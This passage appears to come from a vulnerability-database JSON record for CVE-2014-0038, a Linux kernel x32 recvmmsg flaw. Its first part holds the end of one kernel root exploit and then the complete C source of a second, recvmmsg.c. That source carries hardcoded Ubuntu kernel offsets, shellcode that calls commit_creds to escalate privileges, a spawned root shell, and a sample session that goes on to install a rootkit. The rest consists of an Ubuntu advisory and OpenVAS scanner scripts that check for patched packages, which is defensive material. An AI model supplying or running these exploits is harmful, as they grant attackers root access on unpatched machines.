long code, target;\r\n int pwn;\r\n \r\n /* Prepare payload... */\r\n printf(\"preparing payload buffer...\\n\");\r\n code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);\r\n memset((void*)code, 0x90, PAYLOADSIZE);\r\n code += PAYLOADSIZE - 1024;\r\n memcpy((void*)code, &kernel_payload, 1024);\r\n \r\n /*\r\n * Now clear the three most significant bytes of the fops pointer\r\n * to the release function.\r\n * This will make it point into the memory region mapped above.\r\n */\r\n printf(\"changing kernel pointer to point into controlled buffer...\\n\");\r\n target = PTMX_FOPS + FOPS_RELEASE_OFFSET;\r\n zero_out(target + 7);\r\n zero_out(target + 6);\r\n zero_out(target + 5);\r\n \r\n /* ... and trigger. */\r\n printf(\"releasing file descriptor to call manipulated pointer in kernel mode...\\n\");\r\n pwn = open(\"/dev/ptmx\", 'r');\r\n close(pwn);\r\n \r\n if (getuid() != 0) {\r\n printf(\"failed to get root :(\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n printf(\"got root, enjoy :)\\n\");\r\n return execl(\"/bin/bash\", \"-sh\", NULL);\r\n}\n\n# 0day.today [2018-03-10] #", "sourceHref": "https://0day.today/exploit/21852", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-09T05:10:42", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "Linux kernel 3.4+ local root (CONFIG_X86_X32=y)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21851", "href": "https://0day.today/exploit/description/21851", "sourceData": "/*\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\nrecvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)\r\nCVE-2014-0038 / x32 ABI with recvmmsg\r\nby rebel @ irc.smashthestack.org\r\n-----------------------------------\r\n \r\ntakes about 13 minutes to run because timeout->tv_sec is decremented\r\nonce per second and 0xff*3 is 765.\r\n \r\nsome things you could do while waiting:\r\n * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times\r\n * read https://wiki.ubuntu.com/Security/Features and smirk a few times\r\n * brew some coffee\r\n * stare at the countdown giggly with anticipation\r\n \r\ncould probably whack the high bits of some pointer with nanoseconds,\r\nbut that would require a bunch of nulls before the pointer and then\r\nreading an oops from dmesg which isn't that elegant.\r\n \r\n&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes\r\n \r\nhardcoded offsets because I only saw this on ubuntu & kallsyms is protected\r\nanyway..\r\n \r\nsame principle will work on 32bit but I didn't really find any major\r\ndistros shipping with CONFIG_X86_X32=y\r\n \r\n[email\u00a0protected]:~$ uname -a\r\nLinux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\n[email\u00a0protected]:~$ gcc recvmmsg.c -o recvmmsg\r\n[email\u00a0protected]:~$ ./recvmmsg\r\nbyte 3 / 3.. ~0 secs left. \r\nw00p w00p!\r\n# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n# sh phalanx-2.6b-x86_64.sh\r\nunpacking..\r\n \r\n:)=\r\n \r\ngreets to my homeboys kaliman, beist, capsl & all of #social\r\n \r\nSat Feb 1 22:15:19 CET 2014\r\n% rebel %\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <netinet/ip.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/socket.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <sys/utsname.h>\r\n \r\n#define __X32_SYSCALL_BIT 0x40000000\r\n#undef __NR_recvmmsg\r\n#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\r\n#define VLEN 1\r\n#define BUFSIZE 200\r\n \r\nint port;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long dest; // net_sysctl_root + 96\r\n unsigned long original_value; // net_ctl_permissions\r\n unsigned long prepare_kernel_cred;\r\n unsigned long commit_creds;\r\n};\r\n \r\nstruct offset offsets[] = {\r\n {\"3.11.0-15-generic\",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10\r\n {\"3.11.0-12-generic\",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10\r\n {\"3.8.0-19-generic\",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04\r\n {NULL,0,0,0,0}\r\n};\r\n \r\nvoid udp(int b) {\r\n int sockfd;\r\n struct sockaddr_in servaddr,cliaddr;\r\n int s = 0xff+1;\r\n \r\n if(fork() == 0) {\r\n while(s > 0) {\r\n fprintf(stderr,\"\\rbyte %d / 3.. ~%d secs left \\b\\b\\b\\b\",b+1,3*0xff - b*0xff - (0xff+1-s));\r\n sleep(1);\r\n s--;\r\n fprintf(stderr,\".\");\r\n }\r\n \r\n sockfd = socket(AF_INET,SOCK_DGRAM,0);\r\n bzero(&servaddr,sizeof(servaddr));\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);\r\n servaddr.sin_port=htons(port);\r\n sendto(sockfd,\"1\",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));\r\n exit(0);\r\n }\r\n \r\n}\r\n \r\nvoid trigger() {\r\n open(\"/proc/sys/net/core/somaxconn\",O_RDONLY);\r\n \r\n if(getuid() != 0) {\r\n fprintf(stderr,\"not root, ya blew it!\\n\");\r\n exit(-1);\r\n }\r\n \r\n fprintf(stderr,\"w00p w00p!\\n\");\r\n system(\"/bin/sh -i\");\r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n// thx bliss\r\nstatic int __attribute__((regparm(3)))\r\ngetroot(void *head, void * table)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nvoid __attribute__((regparm(3)))\r\ntrampoline()\r\n{\r\n asm(\"mov $getroot, %rax; call *%rax;\");\r\n}\r\n \r\nint main(void)\r\n{\r\n int sockfd, retval, i;\r\n struct sockaddr_in sa;\r\n struct mmsghdr msgs[VLEN];\r\n struct iovec iovecs[VLEN];\r\n char buf[BUFSIZE];\r\n long mmapped;\r\n struct utsname u;\r\n struct offset *off = NULL;\r\n \r\n uname(&u);\r\n \r\n for(i=0;offsets[i].kernel_version != NULL;i++) {\r\n if(!strcmp(offsets[i].kernel_version,u.release)) {\r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));\r\n mmapped &= 0x000000ffffffffff;\r\n \r\n srand(time(NULL));\r\n port = (rand() % 30000)+1500;\r\n \r\n commit_creds = (_commit_creds)off->commit_creds;\r\n prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;\r\n \r\n mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n \r\n if(mmapped == -1) {\r\n perror(\"mmap()\");\r\n exit(-1);\r\n }\r\n \r\n memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);\r\n \r\n memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);\r\n \r\n if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {\r\n perror(\"mprotect()\");\r\n exit(-1);\r\n }\r\n \r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1) {\r\n perror(\"socket()\");\r\n exit(-1);\r\n }\r\n \r\n sa.sin_family = AF_INET;\r\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n sa.sin_port = htons(port);\r\n \r\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\r\n perror(\"bind()\");\r\n exit(-1);\r\n }\r\n \r\n memset(msgs, 0, sizeof(msgs));\r\n \r\n iovecs[0].iov_base = &buf;\r\n iovecs[0].iov_len = BUFSIZE;\r\n msgs[0].msg_hdr.msg_iov = &iovecs[0];\r\n msgs[0].msg_hdr.msg_iovlen = 1;\r\n \r\n for(i=0;i < 3 ;i++) {\r\n udp(i);\r\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\r\n if(!retval) {\r\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\r\n }\r\n }\r\n \r\n close(sockfd);\r\n \r\n fprintf(stderr,\"\\n\");\r\n \r\n trigger();\r\n}\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/21851", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:52:22", "description": "The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before\n3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain\nprivileges via a recvmmsg system call with a crafted timeout pointer\nparameter.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1274349>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jj](<https://launchpad.net/~jj>) | x32 abi enabled kernels only: CONFIG_X86_X32 &amp;&amp; ld can build x32\n", "cvss3": {}, "published": "2014-01-30T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0038", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-01-30T00:00:00", "id": "UB:CVE-2014-0038", "href": "https://ubuntu.com/security/CVE-2014-0038", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:17:29", "description": "Check for the Version of linux", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2096-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841700", "href": "http://plugins.openvas.org/nasl.php?oid=841700", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2096_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for linux USN-2096-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841700);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:09:49 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-2096-1\");\n\n tag_insight = \"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\";\n\n tag_affected = \"linux on Ubuntu 13.10\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2096-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2096-1/\");\n script_summary(\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic\", ver:\"3.11.0-15.25\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic-lpae\", ver:\"3.11.0-15.25\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2096-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841700", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841700", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2096_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2096-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841700\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:09:49 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-2096-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 13.10\");\n script_tag(name:\"insight\", value:\"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2096-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2096-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU13\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic\", ver:\"3.11.0-15.25\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic-lpae\", ver:\"3.11.0-15.25\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-saucy USN-2095-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841697", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841697", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2095_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-saucy USN-2095-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841697\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:07:40 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-saucy USN-2095-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-saucy on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2095-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2095-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-saucy'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic\", ver:\"3.11.0-15.25~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic-lpae\", ver:\"3.11.0-15.25~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:17:29", "description": "Check for the Version of linux-lts-saucy", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-saucy USN-2095-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841697", "href": "http://plugins.openvas.org/nasl.php?oid=841697", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2095_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for linux-lts-saucy USN-2095-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841697);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:07:40 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-saucy USN-2095-1\");\n\n tag_insight = \"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\";\n\n tag_affected = \"linux-lts-saucy on Ubuntu 12.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2095-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2095-1/\");\n script_summary(\"Check for the Version of linux-lts-saucy\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic\", ver:\"3.11.0-15.25~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.11.0-15-generic-lpae\", ver:\"3.11.0-15.25~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:17:22", "description": "Check for the Version of linux-lts-raring", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-2094-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841698", "href": "http://plugins.openvas.org/nasl.php?oid=841698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2094_1.nasl 7957 2017-12-01 06:40:08Z santu $\n#\n# Ubuntu Update for linux-lts-raring USN-2094-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841698);\n script_version(\"$Revision: 7957 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:40:08 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:08:44 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-2094-1\");\n\n tag_insight = \"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\";\n\n tag_affected = \"linux-lts-raring on Ubuntu 12.04 LTS\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"2094-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-2094-1/\");\n script_summary(\"Check for the Version of linux-lts-raring\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = 